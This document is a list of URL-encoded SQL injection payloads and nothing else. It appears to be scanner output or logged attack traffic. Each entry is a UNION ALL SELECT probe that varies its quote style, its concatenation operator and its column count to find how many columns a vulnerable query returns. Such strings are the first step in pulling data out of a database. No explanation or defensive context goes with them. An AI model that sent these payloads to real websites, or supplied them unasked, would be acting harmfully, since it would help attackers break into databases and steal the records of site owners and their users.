-7924%27%20WHERE%202928%3D2928%20UNION%20ALL%20SELECT%202928%2C2928%2C2928%2C2928%2C2928%2C2928%2C2928%2C2928%2C2928%2C2928%2C2928%2C2928%2C2928%2C2928%2C2928%2C2928%2C2928%2C2928%2C2928%2C2928%2C2928%2C2928%2C2928%2C2928%2C2928%2C2928%2C2928%2C2928%2C2928%2C2928%2C2928%2C2928%2C2928%2C2928--%20 -9428%27%20WHERE%203066%3D3066%20UNION%20ALL%20SELECT%203066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066--%20 -9042%27%20WHERE%209538%3D9538%20UNION%20ALL%20SELECT%209538%2C9538%2C9538%2C9538%2C9538%2C9538%2C9538%2C9538%2C9538%2C9538%2C9538%2C9538%2C9538%2C9538%2C9538%2C9538%2C9538%2C9538%2C9538%2C9538%2C9538%2C9538%2C9538%2C9538%2C9538%2C9538%2C9538%2C9538%2C9538%2C9538%2C9538%2C9538%2C9538%2C9538%2C9538%2C9538--%20 -9606%27%20WHERE%201004%3D1004%20UNION%20ALL%20SELECT%201004%2C1004%2C1004%2C1004%2C1004%2C1004%2C1004%2C1004%2C1004%2C1004%2C1004%2C1004%2C1004%2C1004%2C1004%2C1004%2C1004%2C1004%2C1004%2C1004%2C1004%2C1004%2C1004%2C1004%2C1004%2C1004%2C1004%2C1004%2C1004%2C1004%2C1004%2C1004%2C1004%2C1004%2C1004%2C1004%2C1004--%20 -7824%27%20WHERE%209515%3D9515%20UNION%20ALL%20SELECT%209515%2C9515%2C9515%2C9515%2C9515%2C9515%2C9515%2C9515%2C9515%2C9515%2C9515%2C9515%2C9515%2C9515%2C9515%2C9515%2C9515%2C9515%2C9515%2C9515%2C9515%2C9515%2C9515%2C9515%2C9515%2C9515%2C9515%2C9515%2C9515%2C9515%2C9515%2C9515%2C9515%2C9515%2C9515%2C9515%2C9515%2C9515--%20 -2582%27%20WHERE%207685%3D7685%20UNION%20ALL%20SELECT%207685%2C7685%2C7685%2C7685%2C7685%2C7685%2C7685%2C7685%2C7685%2C7685%2C7685%2C7685%2C7685%2C7685%2C7685%2C7685%2C7685%2C7685%2C7685%2C7685%2C7685%2C7685%2C7685%2C7685%2C7685%2C7685%2C7685%2C7685%2C7685%2C7685%2C7685%2C7685%2C7685%2C7685%2C7685%2C7685%2C7685%2C7685%2C7685--%20 -5279%27%20WHERE%203057%3D3057%20UNION%20ALL%20SELECT%203057%2C3057%2C3057%2C3057%2C3057%2C3057%2C3057%2C3057%2C3057%2C3057%2C3057%2C3057%2C3057%2C3057%2C3057%2C3057%2C3057%2C3057%2C3057%2C3057%2C3057%2C3057%2C3057%2C3057%2C3057%2C3057%2C3057%2C3057%2C3057%2C3057%2C3057%2C3057%2C3057%2C3057%2C3057%2C3057%2C3057%2C3057%2C3057%2C3057--%20 -6774%22%20WHERE%205246%3D5246%20UNION%20ALL%20SELECT%205246%2C5246%2C5246%2C5246%2C5246%2C5246%2C5246%2C5246%2C5246%2C5246%2C5246%2C5246%2C5246%2C5246%2C5246%2C5246%2C5246%2C5246%2C5246%2C5246%2C5246%2C5246%2C5246%2C5246%2C5246%2C5246%2C5246%2C5246%2C5246%2C5246%2C5246--%20 -6291%22%20WHERE%203303%3D3303%20UNION%20ALL%20SELECT%203303%2C3303%2C3303%2C3303%2C3303%2C3303%2C3303%2C3303%2C3303%2C3303%2C3303%2C3303%2C3303%2C3303%2C3303%2C3303%2C3303%2C3303%2C3303%2C3303%2C3303%2C3303%2C3303%2C3303%2C3303%2C3303%2C3303%2C3303%2C3303%2C3303%2C3303%2C3303--%20 -1088%22%20WHERE%202248%3D2248%20UNION%20ALL%20SELECT%202248%2C2248%2C2248%2C2248%2C2248%2C2248%2C2248%2C2248%2C2248%2C2248%2C2248%2C2248%2C2248%2C2248%2C2248%2C2248%2C2248%2C2248%2C2248%2C2248%2C2248%2C2248%2C2248%2C2248%2C2248%2C2248%2C2248%2C2248%2C2248%2C2248%2C2248%2C2248%2C2248--%20 -4812%22%20WHERE%208893%3D8893%20UNION%20ALL%20SELECT%208893%2C8893%2C8893%2C8893%2C8893%2C8893%2C8893%2C8893%2C8893%2C8893%2C8893%2C8893%2C8893%2C8893%2C8893%2C8893%2C8893%2C8893%2C8893%2C8893%2C8893%2C8893%2C8893%2C8893%2C8893%2C8893%2C8893%2C8893%2C8893%2C8893%2C8893%2C8893%2C8893%2C8893--%20 -7809%22%20WHERE%203113%3D3113%20UNION%20ALL%20SELECT%203113%2C3113%2C3113%2C3113%2C3113%2C3113%2C3113%2C3113%2C3113%2C3113%2C3113%2C3113%2C3113%2C3113%2C3113%2C3113%2C3113%2C3113%2C3113%2C3113%2C3113%2C3113%2C3113%2C3113%2C3113%2C3113%2C3113%2C3113%2C3113%2C3113%2C3113%2C3113%2C3113%2C3113%2C3113--%20 -2451%22%20WHERE%203795%3D3795%20UNION%20ALL%20SELECT%203795%2C3795%2C3795%2C3795%2C3795%2C3795%2C3795%2C3795%2C3795%2C3795%2C3795%2C3795%2C3795%2C3795%2C3795%2C3795%2C3795%2C3795%2C3795%2C3795%2C3795%2C3795%2C3795%2C3795%2C3795%2C3795%2C3795%2C3795%2C3795%2C3795%2C3795%2C3795%2C3795%2C3795%2C3795%2C3795--%20 -1956%22%20WHERE%204786%3D4786%20UNION%20ALL%20SELECT%204786%2C4786%2C4786%2C4786%2C4786%2C4786%2C4786%2C4786%2C4786%2C4786%2C4786%2C4786%2C4786%2C4786%2C4786%2C4786%2C4786%2C4786%2C4786%2C4786%2C4786%2C4786%2C4786%2C4786%2C4786%2C4786%2C4786%2C4786%2C4786%2C4786%2C4786%2C4786%2C4786%2C4786%2C4786%2C4786%2C4786--%20 -9308%22%20WHERE%206121%3D6121%20UNION%20ALL%20SELECT%206121%2C6121%2C6121%2C6121%2C6121%2C6121%2C6121%2C6121%2C6121%2C6121%2C6121%2C6121%2C6121%2C6121%2C6121%2C6121%2C6121%2C6121%2C6121%2C6121%2C6121%2C6121%2C6121%2C6121%2C6121%2C6121%2C6121%2C6121%2C6121%2C6121%2C6121%2C6121%2C6121%2C6121%2C6121%2C6121%2C6121%2C6121--%20 -1357%22%20WHERE%208230%3D8230%20UNION%20ALL%20SELECT%208230%2C8230%2C8230%2C8230%2C8230%2C8230%2C8230%2C8230%2C8230%2C8230%2C8230%2C8230%2C8230%2C8230%2C8230%2C8230%2C8230%2C8230%2C8230%2C8230%2C8230%2C8230%2C8230%2C8230%2C8230%2C8230%2C8230%2C8230%2C8230%2C8230%2C8230%2C8230%2C8230%2C8230%2C8230%2C8230%2C8230%2C8230%2C8230--%20 -3091%22%20WHERE%204449%3D4449%20UNION%20ALL%20SELECT%204449%2C4449%2C4449%2C4449%2C4449%2C4449%2C4449%2C4449%2C4449%2C4449%2C4449%2C4449%2C4449%2C4449%2C4449%2C4449%2C4449%2C4449%2C4449%2C4449%2C4449%2C4449%2C4449%2C4449%2C4449%2C4449%2C4449%2C4449%2C4449%2C4449%2C4449%2C4449%2C4449%2C4449%2C4449%2C4449%2C4449%2C4449%2C4449%2C4449--%20 -6851%20WHERE%206448%3D6448%20UNION%20ALL%20SELECT%206448%2C6448%2C6448%2C6448%2C6448%2C6448%2C6448%2C6448%2C6448%2C6448%2C6448%2C6448%2C6448%2C6448%2C6448%2C6448%2C6448%2C6448%2C6448%2C6448%2C6448%2C6448%2C6448%2C6448%2C6448%2C6448%2C6448%2C6448%2C6448%2C6448%2C6448--%20 -1799%20WHERE%206739%3D6739%20UNION%20ALL%20SELECT%206739%2C6739%2C6739%2C6739%2C6739%2C6739%2C6739%2C6739%2C6739%2C6739%2C6739%2C6739%2C6739%2C6739%2C6739%2C6739%2C6739%2C6739%2C6739%2C6739%2C6739%2C6739%2C6739%2C6739%2C6739%2C6739%2C6739%2C6739%2C6739%2C6739%2C6739%2C6739--%20 -3385%20WHERE%206094%3D6094%20UNION%20ALL%20SELECT%206094%2C6094%2C6094%2C6094%2C6094%2C6094%2C6094%2C6094%2C6094%2C6094%2C6094%2C6094%2C6094%2C6094%2C6094%2C6094%2C6094%2C6094%2C6094%2C6094%2C6094%2C6094%2C6094%2C6094%2C6094%2C6094%2C6094%2C6094%2C6094%2C6094%2C6094%2C6094%2C6094--%20 -6458%20WHERE%206512%3D6512%20UNION%20ALL%20SELECT%206512%2C6512%2C6512%2C6512%2C6512%2C6512%2C6512%2C6512%2C6512%2C6512%2C6512%2C6512%2C6512%2C6512%2C6512%2C6512%2C6512%2C6512%2C6512%2C6512%2C6512%2C6512%2C6512%2C6512%2C6512%2C6512%2C6512%2C6512%2C6512%2C6512%2C6512%2C6512%2C6512%2C6512--%20 -8332%20WHERE%205302%3D5302%20UNION%20ALL%20SELECT%205302%2C5302%2C5302%2C5302%2C5302%2C5302%2C5302%2C5302%2C5302%2C5302%2C5302%2C5302%2C5302%2C5302%2C5302%2C5302%2C5302%2C5302%2C5302%2C5302%2C5302%2C5302%2C5302%2C5302%2C5302%2C5302%2C5302%2C5302%2C5302%2C5302%2C5302%2C5302%2C5302%2C5302%2C5302--%20 -2996%20WHERE%205622%3D5622%20UNION%20ALL%20SELECT%205622%2C5622%2C5622%2C5622%2C5622%2C5622%2C5622%2C5622%2C5622%2C5622%2C5622%2C5622%2C5622%2C5622%2C5622%2C5622%2C5622%2C5622%2C5622%2C5622%2C5622%2C5622%2C5622%2C5622%2C5622%2C5622%2C5622%2C5622%2C5622%2C5622%2C5622%2C5622%2C5622%2C5622%2C5622%2C5622--%20 -9340%20WHERE%205245%3D5245%20UNION%20ALL%20SELECT%205245%2C5245%2C5245%2C5245%2C5245%2C5245%2C5245%2C5245%2C5245%2C5245%2C5245%2C5245%2C5245%2C5245%2C5245%2C5245%2C5245%2C5245%2C5245%2C5245%2C5245%2C5245%2C5245%2C5245%2C5245%2C5245%2C5245%2C5245%2C5245%2C5245%2C5245%2C5245%2C5245%2C5245%2C5245%2C5245%2C5245--%20 -4268%20WHERE%209115%3D9115%20UNION%20ALL%20SELECT%209115%2C9115%2C9115%2C9115%2C9115%2C9115%2C9115%2C9115%2C9115%2C9115%2C9115%2C9115%2C9115%2C9115%2C9115%2C9115%2C9115%2C9115%2C9115%2C9115%2C9115%2C9115%2C9115%2C9115%2C9115%2C9115%2C9115%2C9115%2C9115%2C9115%2C9115%2C9115%2C9115%2C9115%2C9115%2C9115%2C9115%2C9115--%20 -1317%20WHERE%209661%3D9661%20UNION%20ALL%20SELECT%209661%2C9661%2C9661%2C9661%2C9661%2C9661%2C9661%2C9661%2C9661%2C9661%2C9661%2C9661%2C9661%2C9661%2C9661%2C9661%2C9661%2C9661%2C9661%2C9661%2C9661%2C9661%2C9661%2C9661%2C9661%2C9661%2C9661%2C9661%2C9661%2C9661%2C9661%2C9661%2C9661%2C9661%2C9661%2C9661%2C9661%2C9661%2C9661--%20 -8780%20WHERE%201452%3D1452%20UNION%20ALL%20SELECT%201452%2C1452%2C1452%2C1452%2C1452%2C1452%2C1452%2C1452%2C1452%2C1452%2C1452%2C1452%2C1452%2C1452%2C1452%2C1452%2C1452%2C1452%2C1452%2C1452%2C1452%2C1452%2C1452%2C1452%2C1452%2C1452%2C1452%2C1452%2C1452%2C1452%2C1452%2C1452%2C1452%2C1452%2C1452%2C1452%2C1452%2C1452%2C1452%2C1452--%20 -2240%27%7C%7C%28SELECT%20%27slwR%27%20FROM%20DUAL%20WHERE%201498%3D1498%20UNION%20ALL%20SELECT%201498%2C1498%2C1498%2C1498%2C1498%2C1498%2C1498%2C1498%2C1498%2C1498%2C1498%2C1498%2C1498%2C1498%2C1498%2C1498%2C1498%2C1498%2C1498%2C1498%2C1498%2C1498%2C1498%2C1498%2C1498%2C1498%2C1498%2C1498%2C1498%2C1498%2C1498--%20 -3097%27%7C%7C%28SELECT%20%27iuBI%27%20FROM%20DUAL%20WHERE%202564%3D2564%20UNION%20ALL%20SELECT%202564%2C2564%2C2564%2C2564%2C2564%2C2564%2C2564%2C2564%2C2564%2C2564%2C2564%2C2564%2C2564%2C2564%2C2564%2C2564%2C2564%2C2564%2C2564%2C2564%2C2564%2C2564%2C2564%2C2564%2C2564%2C2564%2C2564%2C2564%2C2564%2C2564%2C2564%2C2564--%20 -8286%27%7C%7C%28SELECT%20%27sZtc%27%20FROM%20DUAL%20WHERE%203745%3D3745%20UNION%20ALL%20SELECT%203745%2C3745%2C3745%2C3745%2C3745%2C3745%2C3745%2C3745%2C3745%2C3745%2C3745%2C3745%2C3745%2C3745%2C3745%2C3745%2C3745%2C3745%2C3745%2C3745%2C3745%2C3745%2C3745%2C3745%2C3745%2C3745%2C3745%2C3745%2C3745%2C3745%2C3745%2C3745%2C3745--%20 -5728%27%7C%7C%28SELECT%20%27NeYY%27%20FROM%20DUAL%20WHERE%206966%3D6966%20UNION%20ALL%20SELECT%206966%2C6966%2C6966%2C6966%2C6966%2C6966%2C6966%2C6966%2C6966%2C6966%2C6966%2C6966%2C6966%2C6966%2C6966%2C6966%2C6966%2C6966%2C6966%2C6966%2C6966%2C6966%2C6966%2C6966%2C6966%2C6966%2C6966%2C6966%2C6966%2C6966%2C6966%2C6966%2C6966%2C6966--%20 -4247%27%7C%7C%28SELECT%20%27NYiu%27%20FROM%20DUAL%20WHERE%204591%3D4591%20UNION%20ALL%20SELECT%204591%2C4591%2C4591%2C4591%2C4591%2C4591%2C4591%2C4591%2C4591%2C4591%2C4591%2C4591%2C4591%2C4591%2C4591%2C4591%2C4591%2C4591%2C4591%2C4591%2C4591%2C4591%2C4591%2C4591%2C4591%2C4591%2C4591%2C4591%2C4591%2C4591%2C4591%2C4591%2C4591%2C4591%2C4591--%20 -1657%27%7C%7C%28SELECT%20%27nkQB%27%20FROM%20DUAL%20WHERE%208956%3D8956%20UNION%20ALL%20SELECT%208956%2C8956%2C8956%2C8956%2C8956%2C8956%2C8956%2C8956%2C8956%2C8956%2C8956%2C8956%2C8956%2C8956%2C8956%2C8956%2C8956%2C8956%2C8956%2C8956%2C8956%2C8956%2C8956%2C8956%2C8956%2C8956%2C8956%2C8956%2C8956%2C8956%2C8956%2C8956%2C8956%2C8956%2C8956%2C8956--%20 -1211%27%7C%7C%28SELECT%20%27VXZM%27%20FROM%20DUAL%20WHERE%209931%3D9931%20UNION%20ALL%20SELECT%209931%2C9931%2C9931%2C9931%2C9931%2C9931%2C9931%2C9931%2C9931%2C9931%2C9931%2C9931%2C9931%2C9931%2C9931%2C9931%2C9931%2C9931%2C9931%2C9931%2C9931%2C9931%2C9931%2C9931%2C9931%2C9931%2C9931%2C9931%2C9931%2C9931%2C9931%2C9931%2C9931%2C9931%2C9931%2C9931%2C9931--%20 -3674%27%7C%7C%28SELECT%20%27hSqy%27%20FROM%20DUAL%20WHERE%201680%3D1680%20UNION%20ALL%20SELECT%201680%2C1680%2C1680%2C1680%2C1680%2C1680%2C1680%2C1680%2C1680%2C1680%2C1680%2C1680%2C1680%2C1680%2C1680%2C1680%2C1680%2C1680%2C1680%2C1680%2C1680%2C1680%2C1680%2C1680%2C1680%2C1680%2C1680%2C1680%2C1680%2C1680%2C1680%2C1680%2C1680%2C1680%2C1680%2C1680%2C1680%2C1680--%20 -6079%27%7C%7C%28SELECT%20%27APZr%27%20FROM%20DUAL%20WHERE%208450%3D8450%20UNION%20ALL%20SELECT%208450%2C8450%2C8450%2C8450%2C8450%2C8450%2C8450%2C8450%2C8450%2C8450%2C8450%2C8450%2C8450%2C8450%2C8450%2C8450%2C8450%2C8450%2C8450%2C8450%2C8450%2C8450%2C8450%2C8450%2C8450%2C8450%2C8450%2C8450%2C8450%2C8450%2C8450%2C8450%2C8450%2C8450%2C8450%2C8450%2C8450%2C8450%2C8450--%20 -1610%27%7C%7C%28SELECT%20%27chHm%27%20FROM%20DUAL%20WHERE%207554%3D7554%20UNION%20ALL%20SELECT%207554%2C7554%2C7554%2C7554%2C7554%2C7554%2C7554%2C7554%2C7554%2C7554%2C7554%2C7554%2C7554%2C7554%2C7554%2C7554%2C7554%2C7554%2C7554%2C7554%2C7554%2C7554%2C7554%2C7554%2C7554%2C7554%2C7554%2C7554%2C7554%2C7554%2C7554%2C7554%2C7554%2C7554%2C7554%2C7554%2C7554%2C7554%2C7554%2C7554--%20 -2199%27%7C%7C%28SELECT%20%27krEG%27%20WHERE%205318%3D5318%20UNION%20ALL%20SELECT%205318%2C5318%2C5318%2C5318%2C5318%2C5318%2C5318%2C5318%2C5318%2C5318%2C5318%2C5318%2C5318%2C5318%2C5318%2C5318%2C5318%2C5318%2C5318%2C5318%2C5318%2C5318%2C5318%2C5318%2C5318%2C5318%2C5318%2C5318%2C5318%2C5318%2C5318--%20 -5629%27%7C%7C%28SELECT%20%27UZNo%27%20WHERE%204507%3D4507%20UNION%20ALL%20SELECT%204507%2C4507%2C4507%2C4507%2C4507%2C4507%2C4507%2C4507%2C4507%2C4507%2C4507%2C4507%2C4507%2C4507%2C4507%2C4507%2C4507%2C4507%2C4507%2C4507%2C4507%2C4507%2C4507%2C4507%2C4507%2C4507%2C4507%2C4507%2C4507%2C4507%2C4507%2C4507--%20 -6707%27%7C%7C%28SELECT%20%27WFBw%27%20WHERE%203554%3D3554%20UNION%20ALL%20SELECT%203554%2C3554%2C3554%2C3554%2C3554%2C3554%2C3554%2C3554%2C3554%2C3554%2C3554%2C3554%2C3554%2C3554%2C3554%2C3554%2C3554%2C3554%2C3554%2C3554%2C3554%2C3554%2C3554%2C3554%2C3554%2C3554%2C3554%2C3554%2C3554%2C3554%2C3554%2C3554%2C3554--%20 -9471%27%7C%7C%28SELECT%20%27STVn%27%20WHERE%206691%3D6691%20UNION%20ALL%20SELECT%206691%2C6691%2C6691%2C6691%2C6691%2C6691%2C6691%2C6691%2C6691%2C6691%2C6691%2C6691%2C6691%2C6691%2C6691%2C6691%2C6691%2C6691%2C6691%2C6691%2C6691%2C6691%2C6691%2C6691%2C6691%2C6691%2C6691%2C6691%2C6691%2C6691%2C6691%2C6691%2C6691%2C6691--%20 -6109%27%7C%7C%28SELECT%20%27FxyD%27%20WHERE%207246%3D7246%20UNION%20ALL%20SELECT%207246%2C7246%2C7246%2C7246%2C7246%2C7246%2C7246%2C7246%2C7246%2C7246%2C7246%2C7246%2C7246%2C7246%2C7246%2C7246%2C7246%2C7246%2C7246%2C7246%2C7246%2C7246%2C7246%2C7246%2C7246%2C7246%2C7246%2C7246%2C7246%2C7246%2C7246%2C7246%2C7246%2C7246%2C7246--%20 -7342%27%7C%7C%28SELECT%20%27ZxlK%27%20WHERE%206428%3D6428%20UNION%20ALL%20SELECT%206428%2C6428%2C6428%2C6428%2C6428%2C6428%2C6428%2C6428%2C6428%2C6428%2C6428%2C6428%2C6428%2C6428%2C6428%2C6428%2C6428%2C6428%2C6428%2C6428%2C6428%2C6428%2C6428%2C6428%2C6428%2C6428%2C6428%2C6428%2C6428%2C6428%2C6428%2C6428%2C6428%2C6428%2C6428%2C6428--%20 -3481%27%7C%7C%28SELECT%20%27roih%27%20WHERE%209197%3D9197%20UNION%20ALL%20SELECT%209197%2C9197%2C9197%2C9197%2C9197%2C9197%2C9197%2C9197%2C9197%2C9197%2C9197%2C9197%2C9197%2C9197%2C9197%2C9197%2C9197%2C9197%2C9197%2C9197%2C9197%2C9197%2C9197%2C9197%2C9197%2C9197%2C9197%2C9197%2C9197%2C9197%2C9197%2C9197%2C9197%2C9197%2C9197%2C9197%2C9197--%20 -5702%27%7C%7C%28SELECT%20%27kUOW%27%20WHERE%206771%3D6771%20UNION%20ALL%20SELECT%206771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771--%20 -5469%27%7C%7C%28SELECT%20%27PWgg%27%20WHERE%208200%3D8200%20UNION%20ALL%20SELECT%208200%2C8200%2C8200%2C8200%2C8200%2C8200%2C8200%2C8200%2C8200%2C8200%2C8200%2C8200%2C8200%2C8200%2C8200%2C8200%2C8200%2C8200%2C8200%2C8200%2C8200%2C8200%2C8200%2C8200%2C8200%2C8200%2C8200%2C8200%2C8200%2C8200%2C8200%2C8200%2C8200%2C8200%2C8200%2C8200%2C8200%2C8200%2C8200--%20 -8790%27%7C%7C%28SELECT%20%27OSBS%27%20WHERE%206947%3D6947%20UNION%20ALL%20SELECT%206947%2C6947%2C6947%2C6947%2C6947%2C6947%2C6947%2C6947%2C6947%2C6947%2C6947%2C6947%2C6947%2C6947%2C6947%2C6947%2C6947%2C6947%2C6947%2C6947%2C6947%2C6947%2C6947%2C6947%2C6947%2C6947%2C6947%2C6947%2C6947%2C6947%2C6947%2C6947%2C6947%2C6947%2C6947%2C6947%2C6947%2C6947%2C6947%2C6947--%20 -4186%27%2B%28SELECT%20dmdE%20WHERE%209775%3D9775%20UNION%20ALL%20SELECT%209775%2C9775%2C9775%2C9775%2C9775%2C9775%2C9775%2C9775%2C9775%2C9775%2C9775%2C9775%2C9775%2C9775%2C9775%2C9775%2C9775%2C9775%2C9775%2C9775%2C9775%2C9775%2C9775%2C9775%2C9775%2C9775%2C9775%2C9775%2C9775%2C9775%2C9775--%20 -7887%27%2B%28SELECT%20meSO%20WHERE%205630%3D5630%20UNION%20ALL%20SELECT%205630%2C5630%2C5630%2C5630%2C5630%2C5630%2C5630%2C5630%2C5630%2C5630%2C5630%2C5630%2C5630%2C5630%2C5630%2C5630%2C5630%2C5630%2C5630%2C5630%2C5630%2C5630%2C5630%2C5630%2C5630%2C5630%2C5630%2C5630%2C5630%2C5630%2C5630%2C5630--%20 -6041%27%2B%28SELECT%20ukiL%20WHERE%207789%3D7789%20UNION%20ALL%20SELECT%207789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789--%20 -1925%27%2B%28SELECT%20lNFA%20WHERE%209176%3D9176%20UNION%20ALL%20SELECT%209176%2C9176%2C9176%2C9176%2C9176%2C9176%2C9176%2C9176%2C9176%2C9176%2C9176%2C9176%2C9176%2C9176%2C9176%2C9176%2C9176%2C9176%2C9176%2C9176%2C9176%2C9176%2C9176%2C9176%2C9176%2C9176%2C9176%2C9176%2C9176%2C9176%2C9176%2C9176%2C9176%2C9176--%20 -2649%27%2B%28SELECT%20gFuw%20WHERE%205823%3D5823%20UNION%20ALL%20SELECT%205823%2C5823%2C5823%2C5823%2C5823%2C5823%2C5823%2C5823%2C5823%2C5823%2C5823%2C5823%2C5823%2C5823%2C5823%2C5823%2C5823%2C5823%2C5823%2C5823%2C5823%2C5823%2C5823%2C5823%2C5823%2C5823%2C5823%2C5823%2C5823%2C5823%2C5823%2C5823%2C5823%2C5823%2C5823--%20 -6739%27%2B%28SELECT%20rXHf%20WHERE%208529%3D8529%20UNION%20ALL%20SELECT%208529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529--%20 -2096%27%2B%28SELECT%20sCJw%20WHERE%203718%3D3718%20UNION%20ALL%20SELECT%203718%2C3718%2C3718%2C3718%2C3718%2C3718%2C3718%2C3718%2C3718%2C3718%2C3718%2C3718%2C3718%2C3718%2C3718%2C3718%2C3718%2C3718%2C3718%2C3718%2C3718%2C3718%2C3718%2C3718%2C3718%2C3718%2C3718%2C3718%2C3718%2C3718%2C3718%2C3718%2C3718%2C3718%2C3718%2C3718%2C3718--%20 -3916%27%2B%28SELECT%20Twhw%20WHERE%204840%3D4840%20UNION%20ALL%20SELECT%204840%2C4840%2C4840%2C4840%2C4840%2C4840%2C4840%2C4840%2C4840%2C4840%2C4840%2C4840%2C4840%2C4840%2C4840%2C4840%2C4840%2C4840%2C4840%2C4840%2C4840%2C4840%2C4840%2C4840%2C4840%2C4840%2C4840%2C4840%2C4840%2C4840%2C4840%2C4840%2C4840%2C4840%2C4840%2C4840%2C4840%2C4840--%20 -1570%27%2B%28SELECT%20sBFe%20WHERE%204079%3D4079%20UNION%20ALL%20SELECT%204079%2C4079%2C4079%2C4079%2C4079%2C4079%2C4079%2C4079%2C4079%2C4079%2C4079%2C4079%2C4079%2C4079%2C4079%2C4079%2C4079%2C4079%2C4079%2C4079%2C4079%2C4079%2C4079%2C4079%2C4079%2C4079%2C4079%2C4079%2C4079%2C4079%2C4079%2C4079%2C4079%2C4079%2C4079%2C4079%2C4079%2C4079%2C4079--%20 -5739%27%2B%28SELECT%20IYyK%20WHERE%205540%3D5540%20UNION%20ALL%20SELECT%205540%2C5540%2C5540%2C5540%2C5540%2C5540%2C5540%2C5540%2C5540%2C5540%2C5540%2C5540%2C5540%2C5540%2C5540%2C5540%2C5540%2C5540%2C5540%2C5540%2C5540%2C5540%2C5540%2C5540%2C5540%2C5540%2C5540%2C5540%2C5540%2C5540%2C5540%2C5540%2C5540%2C5540%2C5540%2C5540%2C5540%2C5540%2C5540%2C5540--%20 -9669%27%2B%28SELECT%20%27rKyl%27%20WHERE%205682%3D5682%20UNION%20ALL%20SELECT%205682%2C5682%2C5682%2C5682%2C5682%2C5682%2C5682%2C5682%2C5682%2C5682%2C5682%2C5682%2C5682%2C5682%2C5682%2C5682%2C5682%2C5682%2C5682%2C5682%2C5682%2C5682%2C5682%2C5682%2C5682%2C5682%2C5682%2C5682%2C5682%2C5682%2C5682--%20 -8305%27%2B%28SELECT%20%27DYiM%27%20WHERE%208599%3D8599%20UNION%20ALL%20SELECT%208599%2C8599%2C8599%2C8599%2C8599%2C8599%2C8599%2C8599%2C8599%2C8599%2C8599%2C8599%2C8599%2C8599%2C8599%2C8599%2C8599%2C8599%2C8599%2C8599%2C8599%2C8599%2C8599%2C8599%2C8599%2C8599%2C8599%2C8599%2C8599%2C8599%2C8599%2C8599--%20 -9340%27%2B%28SELECT%20%27nxoT%27%20WHERE%209107%3D9107%20UNION%20ALL%20SELECT%209107%2C9107%2C9107%2C9107%2C9107%2C9107%2C9107%2C9107%2C9107%2C9107%2C9107%2C9107%2C9107%2C9107%2C9107%2C9107%2C9107%2C9107%2C9107%2C9107%2C9107%2C9107%2C9107%2C9107%2C9107%2C9107%2C9107%2C9107%2C9107%2C9107%2C9107%2C9107%2C9107--%20 -2150%27%2B%28SELECT%20%27yOMy%27%20WHERE%202134%3D2134%20UNION%20ALL%20SELECT%202134%2C2134%2C2134%2C2134%2C2134%2C2134%2C2134%2C2134%2C2134%2C2134%2C2134%2C2134%2C2134%2C2134%2C2134%2C2134%2C2134%2C2134%2C2134%2C2134%2C2134%2C2134%2C2134%2C2134%2C2134%2C2134%2C2134%2C2134%2C2134%2C2134%2C2134%2C2134%2C2134%2C2134--%20 -5347%27%2B%28SELECT%20%27Prfx%27%20WHERE%201615%3D1615%20UNION%20ALL%20SELECT%201615%2C1615%2C1615%2C1615%2C1615%2C1615%2C1615%2C1615%2C1615%2C1615%2C1615%2C1615%2C1615%2C1615%2C1615%2C1615%2C1615%2C1615%2C1615%2C1615%2C1615%2C1615%2C1615%2C1615%2C1615%2C1615%2C1615%2C1615%2C1615%2C1615%2C1615%2C1615%2C1615%2C1615%2C1615--%20 -3369%27%2B%28SELECT%20%27avKe%27%20WHERE%209828%3D9828%20UNION%20ALL%20SELECT%209828%2C9828%2C9828%2C9828%2C9828%2C9828%2C9828%2C9828%2C9828%2C9828%2C9828%2C9828%2C9828%2C9828%2C9828%2C9828%2C9828%2C9828%2C9828%2C9828%2C9828%2C9828%2C9828%2C9828%2C9828%2C9828%2C9828%2C9828%2C9828%2C9828%2C9828%2C9828%2C9828%2C9828%2C9828%2C9828--%20 -8048%27%2B%28SELECT%20%27itLG%27%20WHERE%206052%3D6052%20UNION%20ALL%20SELECT%206052%2C6052%2C6052%2C6052%2C6052%2C6052%2C6052%2C6052%2C6052%2C6052%2C6052%2C6052%2C6052%2C6052%2C6052%2C6052%2C6052%2C6052%2C6052%2C6052%2C6052%2C6052%2C6052%2C6052%2C6052%2C6052%2C6052%2C6052%2C6052%2C6052%2C6052%2C6052%2C6052%2C6052%2C6052%2C6052%2C6052--%20 -8772%27%2B%28SELECT%20%27RrFI%27%20WHERE%208839%3D8839%20UNION%20ALL%20SELECT%208839%2C8839%2C8839%2C8839%2C8839%2C8839%2C8839%2C8839%2C8839%2C8839%2C8839%2C8839%2C8839%2C8839%2C8839%2C8839%2C8839%2C8839%2C8839%2C8839%2C8839%2C8839%2C8839%2C8839%2C8839%2C8839%2C8839%2C8839%2C8839%2C8839%2C8839%2C8839%2C8839%2C8839%2C8839%2C8839%2C8839%2C8839--%20 